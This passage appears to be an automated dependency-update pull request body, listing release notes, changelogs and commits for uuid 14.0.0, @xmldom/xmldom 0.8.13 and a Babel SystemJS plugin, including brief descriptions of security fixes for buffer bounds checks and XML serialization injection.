href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003ef2c235f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUse GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003effa3138\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.1...v13.0.2\"\u003e13.0.2\u003c/a\u003e (2026-05-04)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ererelease to fix provenance. (\u003ca href=\"https://github.com/uuidjs/uuid/commit/49ccb35f78c0c4ce1409dd2f1d89f83caadba10b\"\u003e49ccb35\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2026-04-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ebackport fix for GHSA-w5hq-g745-h8pq (\u003ca href=\"https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a\"\u003e9d27ddf\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/blob/main/CHANGELOG.md\"\u003euuid's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq\"\u003eGHSA-w5hq-g745-h8pq\u003c/a\u003e: \u003ccode\u003ev3()\u003c/code\u003e, \u003ccode\u003ev5()\u003c/code\u003e, and \u003ccode\u003ev6()\u003c/code\u003e did not validate that writes would remain within the bounds of a caller-supplied buffer, allowing out-of-bounds writes when an invalid \u003ccode\u003eoffset\u003c/code\u003e was provided. A \u003ccode\u003eRangeError\u003c/code\u003e is now thrown if \u003ccode\u003eoffset \u0026lt; 0\u003c/code\u003e or \u003ccode\u003eoffset + 16 \u0026gt; buf.length\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ecrypto\u003c/code\u003e is now expected to be globally defined (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade minimum supported TypeScript version to 5.4.3, in keeping with the project's policy of supporting TypeScript versions released within the last two years\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/7c1ea087a8149b57380fc8bb7f68c3a215cb6e4b\"\u003e\u003ccode\u003e7c1ea08\u003c/code\u003e\u003c/a\u003e chore(main): release 14.0.0 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/926\"\u003e#926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34\"\u003e\u003ccode\u003e3d2c5b0\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/f2c235f93059325fa43e1106e624b5291bb523c4\"\u003e\u003ccode\u003ef2c235f\u003c/code\u003e\u003c/a\u003e fix!: expect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/529ef0899f5dd503d2ee90d690585d63d78bc212\"\u003e\u003ccode\u003e529ef08\u003c/code\u003e\u003c/a\u003e chore: upgrade TypeScript and fixup types (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/927\"\u003e#927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/086fd7976f11433edf9ac80be876b3ad243fe087\"\u003e\u003ccode\u003e086fd79\u003c/code\u003e\u003c/a\u003e chore: update dependencies (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/933\"\u003e#933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003e\u003ccode\u003edc4ddb8\u003c/code\u003e\u003c/a\u003e feat!: drop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0f1f9c9c9cedbae5a1d363d5406c5dfbabe81404\"\u003e\u003ccode\u003e0f1f9c9\u003c/code\u003e\u003c/a\u003e chore: switch to Biome for parsing and linting (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/932\"\u003e#932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2879e64bf125add903c1eff6e0860542c605013\"\u003e\u003ccode\u003ee2879e6\u003c/code\u003e\u003c/a\u003e chore: use maintained version of npm-run-all (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/930\"\u003e#930\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ffa31383e8e4e1f0b4e22e504561272041b8738c\"\u003e\u003ccode\u003effa3138\u003c/code\u003e\u003c/a\u003e fix: Use GITHUB_TOKEN for release-please and enable npm provenance (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/925\"\u003e#925\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0423d49df2dc8efc300c804731d25f4d7e0fccc4\"\u003e\u003ccode\u003e0423d49\u003c/code\u003e\u003c/a\u003e docs: remove obsolete v1 option notes (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for uuid since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@xmldom/xmldom` from 0.8.12 to 0.8.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e@​xmldom/xmldom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/blob/master/CHANGELOG.md\"\u003e@​xmldom/xmldom's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003e0.8.13\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.9.8...0.9.9\"\u003e0.9.9\u003c/a\u003e\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eimplement \u003ccode\u003eParentNode.children\u003c/code\u003e getter \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/960\"\u003e\u003ccode\u003e[#960](https://github.com/xmldom/xmldom/issues/960)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/410\"\u003e\u003ccode\u003e[#410](https://github.com/xmldom/xmldom/issues/410)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ecorrectly traverse ancestor chain in \u003ccode\u003eNode.contains\u003c/code\u003e \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/931\"\u003e\u003ccode\u003e[#931](https://github.com/xmldom/xmldom/issues/931)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe behavior will now receive \u003ccode\u003eInvalidCharacterError\u003c/code\u003e. Use a mutation method such as \u003ccode\u003eappendData\u003c/code\u003e if you intentionally need \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e in a CDATASection node's data.\u003c/p\u003e\n\u003ch3\u003eChore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdated dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/stevenobiajulu\"\u003e\u003ccode\u003e@​stevenobiajulu\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/yoshi389111\"\u003e\u003ccode\u003e@​yoshi389111\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e5c14802592685bb872c042c54c3f73758875c85\"\u003e\u003ccode\u003ee5c1480\u003c/code\u003e\u003c/a\u003e 0.8.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/9611e20d75f059dc377f806a8f7ee7d1eaeaeb7c\"\u003e\u003ccode\u003e9611e20\u003c/code\u003e\u003c/a\u003e style: drop unused import in test file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/dc4dff3d1d0b5a6b97c52fcc1823a735b8821e62\"\u003e\u003ccode\u003edc4dff3\u003c/code\u003e\u003c/a\u003e docs: add 0.8.13 changelog entry\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/842fa38deedd2d9a9c90d0ad54aa1be75d2a41bc\"\u003e\u003ccode\u003e842fa38\u003c/code\u003e\u003c/a\u003e fix: prevent stack overflow in normalize (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/aeff69f5a32e8c1bd540683da9e10718f84f595c\"\u003e\u003ccode\u003eaeff69f\u003c/code\u003e\u003c/a\u003e test: add normalize behavioral coverage to node.test.js\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/cbdb0d7db8ae70760bd4cc181cb8f30bb0cd9d88\"\u003e\u003ccode\u003ecbdb0d7\u003c/code\u003e\u003c/a\u003e fix: make walkDOM iterative to prevent stack overflow (GHSA-2v35-w6hq-6mfw)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/0b543d31794dc198c86a0358574cb5dec29674c5\"\u003e\u003ccode\u003e0b543d3\u003c/code\u003e\u003c/a\u003e test: assert namespace declarations are isolated between siblings in serializ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/c007c51909587990c962cf3d5c2acadf4c897b87\"\u003e\u003ccode\u003ec007c51\u003c/code\u003e\u003c/a\u003e refactor: migrate serializeToString to walkDOM\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/2bb3899074820089d9e76ce28a5edfdacf425025\"\u003e\u003ccode\u003e2bb3899\u003c/code\u003e\u003c/a\u003e test: add serializeToString coverage for uncovered branches\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/xmldom/xmldom/commit/e69f38d0a58731152d300e8c8eb29506f5f488fe\"\u003e\u003ccode\u003ee69f38d\u003c/code\u003e\u003c/a\u003e refactor: migrate importNode to walkDOM\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~karfau\"\u003ekarfau\u003c/a\u003e, a new releaser for \u003ccode\u003e@​xmldom/xmldom\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.23.3 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca 